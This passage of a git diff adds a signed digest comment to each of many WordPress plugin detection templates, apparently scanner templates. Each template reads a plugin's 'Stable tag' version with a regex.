\ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..ff37b82473 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220607473f7e11bb477715162496e12df71eb3b31b2482106bb76b0890c533f65f40220569552e1f3b0a092d6fc881e329e87729eb603476d2f0ec7ca520361e9065b1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..a06561234e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e1f64aeb6e089d0af7ff56201c0a14c04e6364e64c48be12481158b690deb81c02202ad1148e828730fd6e9a9411498dd077af0b5391d193434426624995a8905a0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..08e12dc7fc 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022010f87cecf17e6321a687a551ec05422dee0b0ba5bbc78edd60d49c66cc46430b0221009a37b5258c707ce4e529cd12fc87bf8982f6e158a39fc156b9a23715fbfc0c30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..134d3e48b8 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a463a46e78f394a3160871f5881546aee8b26c7dad24d8605a10f367e3ba772d022075ab4beb11aa7c9ed5af397f4d6c0cbc6d9d5c710903a4b07bee7f120218443c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..8a46285762 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008d6f9a135688f4bb5b836a20af9d01275a63baa831db81d63f5c1fae01015e17022100efbaa1c9963dd8d39ba48e43c6680811472e87fadad7fe01d74201539d16a659:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..e2fc0ca257 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206e4471f6ad605a62d1b989fee4a3af185349fec7f50f00ff6356772aa8707c5c022100b223b33d5f0e2db32aea27a4b0162c66cf920184a2361b57854b925c46146b62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..afdfc90ee0 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008b08c43453df562930ea56c3adb15cd6eab72371f10c7d1de06d127071c3d224022100f0e91430c3b2e6fb13018734fa2a11fb28444ce8b3d77fa527d774614cca9d76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..26120882b9 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100883d4ea915b26f00f21e6046958c2981eb2b36776df23be9b7df16fea63ee03f022100bd8671a42b0b2a7a703a0f14437aa90bf389ec63f2c0099ad14e06fd1ddd8b84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..07e39060e5 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022004eeeb75b025a52e1b6c0d86c5a8320022b99557130210ae7c5a2f09705d20cb022100b0a51666886a627bcf9a8880308c7ecf19a343b3ebbc97c065ff89cf0483070f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..055991bd1c 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100be6844b8ddaa9001370dd18d1f6e3cfde5d0be9d8226d5dd33fdd683fcfcde2c022100a1803bb5ba476c16e4d34d1a7a5f875b374937a1b58190e4656865a9304482dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..51623069e7 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100916a17271f993f937ad28ef57ab5d029fae29a5e45c755f08fe54805250f13df02205c726e9fc20cb95b74be915109bcbd8ca966dc5e7255184c45b0d87dfdb89845:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..8e38a1612f 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206ab52e8645660b894e37142f6cd2084ecca6b8716a07cbc823c572491dbf8f69022100d60f41074c4ada6868029945a38b21d84a2b1f40e6f1541c632e00ddf8d9ffcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..89c0401c39 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aeb1cef9e6380efa25562a39067e1fd9bea01c0cc18b4afed8e60a64ee44b494022100e8d14b6851e908211f04b40b94ef5af6ade95bb1642c5d69ceabbe49686fb814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..7f135099f0 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203b084be1dc8d297c87430ba7548e094f0bd7a5d9231b125e76710e2f02e9de5b022100b6144037190adcaaa0137c0d547d5f59f5aee91ce35e28e70884f78eb7dbb1af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..d3ff937cce 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aac2483ab0c3b1bff24a48e3a64d7a701827a214f964e8900cb0ebd6b5991246022009e80ee1863b4ab9ad5cf66eaf536445a4b83cb1efb63e721c3af4e6e590e532:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..6223e46443 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200d27d4b1578825bb4d36ae1432bbfe96cc1237d828e2b51e542d3499f0aa446002205e888727f52035b30117fcc55e0433ebbf829080abbc99d658750f65bf304083:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..5191a50ea3 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022059b7ed84c06906e3d0e34335a4de3dbc78a8d204719468728e9e5a0ee41a045902202daadd468699f86d0b6684eace876aef66888a0fa0d81f097a403ad255034eab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..15ed058047 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022068c39995af70e395929a4a108764b8f47ea64e945cf875dee001c0689577c18e022100afcbd25d3141dba19d1ce69d09477a5a7d4b2d246b6dfc7dc1642db4ba1b3552:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..cffae16488 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e756458f21c1134738025c54bb36ff75e11da5a1dd28d1f72ab2f5c78cd1819302200b4bb6c874c13dd95fe3d84a5e863096935c5fc3e2565062cbacc102c4a5665e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..83d86646a5 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022010cc17bdac27b911a47fc3afca9202e19b94f93a6fc7db3c2124ba93de268203022100cb610e5a998b31d4a6ca6234f71a275a8060bc85276c476f75a51397a015c765:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..93f3e988b6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c394d07f8b52b9b4d387d9ac34d4c2ddcd358b8014194ba1ea6814bd35d6acaf022100ad72f3107c32ef502e5afb6106b94078355b2a198e7bb9874346dfc01380cd17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..e11ae6207a 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202db6da8d0fbabc08bc3b77759455e1558163e4a46940153967385d2ddf09be8502203272da9c81efe661401064a4d4e2538fea24e1512ae7797f22e804779ca32220:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..b18c463253 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022073bbef5c2130c6a4dcd4beb244a5d4204f2addfb27113addf7f3f598d102b95b022100c5a2f2d7af53a10cbc61543b2c1558725e6c138a9bb1ce0556669571ad3c33c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..084042bf4f 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022071cb78ecf4980cc96010ede14934fe7f1a3746e5eee3f603cf74e7ced7e3a659022100c675ff58aac7d4274506df97def448cb38b2af6ac5cf6572944361372d21caa9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..ff30cfe730 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022036a4a6c037857cae8cc4099fdd1ef2671726acd26bec8b57d427102ecd50b3b80220395fa3c535da59ceb770a6b9c912495da198b85387d1a39061057ba0a522ea64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..293a1f68dc 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008bc7e59a0d17e2f2a48746005dcc504a0a387e9ff70b9d5930ef0851c660c7be022014699f47773613ae4135e7cd0851851d376dd31d2fa3477804c0acfbc0f34673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..d911945054 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c6f903d18f23c923ee2e6d63f02e5340016973cd93fe0c0ff6605b2e103cc7c302203d90075a400d47696e42d3dc4037668d9b70860b6d59e894e8cfbf5861b5edac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..0eba2bdb34 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a5e5e281d843d8fb0524310490673f502feb4d02641ec35ece0e0bb9b2394c05022100a577aef2495197b990ccadc359d5fd9fb2f55b02a8df30aac95942d259798b69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..52d9cf199f 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e4466787a38573bdb5eb747940059b4d2e6d8db618461e07800c500a7face59c02210084469416612d9d759b956bd5e7a5d82cf569ffd9e2e83ad2af800cb753824a2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..3b075d4b02 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206b9b251a160c749b83bc33b930ee9b3d1a05171c478e24abc7ff661295d65727022100e305a7138110a4bf1ff45707b7980cbe001f8a49b2b12d11a9fdad19e9dc588a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..851d49bdd1 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210087e3e77cfb97da2649501617848b36cd660b581712af974c7671b55700c78883022100a2f270caf207fd5b643d46157e7ace439c1179fca24672989b9424d013362c8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..5718647a44 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022003256e20dae8774073a999145ac5931130a764ac537cc86479a99081e37c89ec022100f6ffc8193d2ddd4ba661de8c8f74f3d02ec6db50788a00ff7ae257d0653941b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..1feee9f67a 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c6729d3f0c61b2c0e1b00fc9f29948183f66d3b3fa127e0470ca097df298122c022100fa7f4c566c25805af89086244cea9de3a2538a9681617aaab7460d3a18233802:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..4fdf056328 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ce4f26e856522f7e1bf4ae09a04f1f892cfa8d18d91d7ea2ba5a0e9e73d5357702210093487abd1e08939e36076e0a48cd57b26790aebb42f11c94108ed200c3df88e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..dd9f276d9b 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d73b7dd0c59e8220c12e450c282d4fd17d27a2753839d8953ffb547451d918810220473d8aff68773f7f353aecb0eb01fc4acce1ce5c77dbc42f812ddc2fac590be1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..d84b845868 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fbcfe241a8c77ee53ced16b75011970ff3b1d4561c0d5f785a82e25f582b378b02203e6db9d97c9f875aa0f1b15a911fabcfbcb6cfe9787c7a12e0072282cf8a0baf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..93a0ec2d21 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100937074a0676d4cd19ef7115c144d40356f2158bfe8e0c14c0240a825f1c19e52022024040275e59f57d70d0bb634ba78a30b973117891b3224418022627382fb5e27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..9501baf3b4 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204b8070d2aa260dbc33875bf214295d8d5ee1fad6376d7e77f179dc96559768c302210095303107af7ca41635ed4542740375a90140025855dcfd31184239e98d7c339b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..a323e7b18c 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b32a5e0427fdad2aad54d092967a571ecb57ee9764ec94f2be6030489af2e782022100a8cf71556958f22ea3980156e79300771287247450c1cb0458ba06d7fe432e42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..9231a5f4f6 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008c8a33a2252b0aa6e5dff66ecda3c8f2bc1fd3ac19a5923e1d6270a5e6d12f14022100a155de8d9b35d03ea4f564a1840e0ee5dcbbef1304b525be7a6fc207561e0ea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..aa5d25c053 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200114533d1bca1efe687716d8166c753f143781b9b5a913990161baa1a4e72485022100c5b613db35140eb464a6b3cacdd12d2acfadb163571feb4595baa775937fcb4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..1586aaf8ed 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009646ef0e2fb2ef019944fa0b80be46ba2b33a68a409c42b6fd09853ff398ede40220164f83ad5c3c3d7fddfd7a55e067cc6b80f24a1ab7e6507c190aa784b14711f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..4cc8104fd7 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b97b761424ee0aace93fee89d463e309bd6984c1893058c3a2c5e6c9f81fd5450220435a15a9f50c2fb718b6a929fbae94601bf130d8cad42940386a2c3e77aab502:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..64eb36969e 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207e8368b39667ca329e810c329a3868400d67264199549929cc32d8f39727f65202202221c6f756447376d6d78be472bdeb961487d32d3abcd504bdf62df167dc485f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..962cdc6b1d 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200f3bbcb8182ff06b1598f8cbe1a94d3a7d8ce53cb4cd8345e2726be5b04f056b0220337fa42c2966253157a6cf39f51750d49efaf5b8bbef9be3d1b9860dad70dafa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..61aa6e7c31 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201663a76dcbbc33401f6b49c4bbd24bdce186fffe13656334f0b958e755b0d384022100b4ae7a6310563b6006708368509c7db0495fb566f8ff023b9c59b9811b16cf41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..df9466ab71 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a1f138f5e9c01a0a242a5ddd7649656ef33c5f09f876eaa48218bdc2b761df950221008e712275256fe907072dc2744f0464a775367f71c7e784e28ab47c21c6e2797d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 